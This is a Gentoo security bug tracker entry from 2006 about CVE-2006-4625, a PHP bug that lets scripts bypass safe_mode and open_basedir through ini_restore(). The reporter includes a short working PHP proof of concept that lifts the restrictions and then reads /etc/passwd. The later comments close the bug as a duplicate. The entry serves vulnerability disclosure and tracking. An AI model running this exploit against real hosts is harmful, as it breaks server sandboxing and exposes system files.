Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 152473 - dev-lang/php safe_mode and open_basedir bypass by ini_restore()
Summary: dev-lang/php safe_mode and open_basedir bypass by ini_restore()
Status: RESOLVED DUPLICATE of bug 147061
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High major (vote)
Assignee: Gentoo Security
URL: http://cve.mitre.org/cgi-bin/cvename....
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2006-10-23 01:00 UTC by Pavel Shirov
Modified: 2006-11-09 13:19 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Pavel Shirov 2006-10-23 01:00:08 UTC
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4625
http://secunia.com/advisories/22282/

Exploit:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
Comment 1 Matthias Geerdsen (RETIRED) gentoo-dev 2006-11-09 13:18:57 UTC
this has been overlooked since it was not assigned to security and was restricted, so bug-wranglers could not see it

anyways, the issue has been solved a while ago it seems
Comment 2 Matthias Geerdsen (RETIRED) gentoo-dev 2006-11-09 13:19:33 UTC
reassigning now too, sorry for the spam
Comment 3 Matthias Geerdsen (RETIRED) gentoo-dev 2006-11-09 13:19:57 UTC

*** This bug has been marked as a duplicate of 147061 ***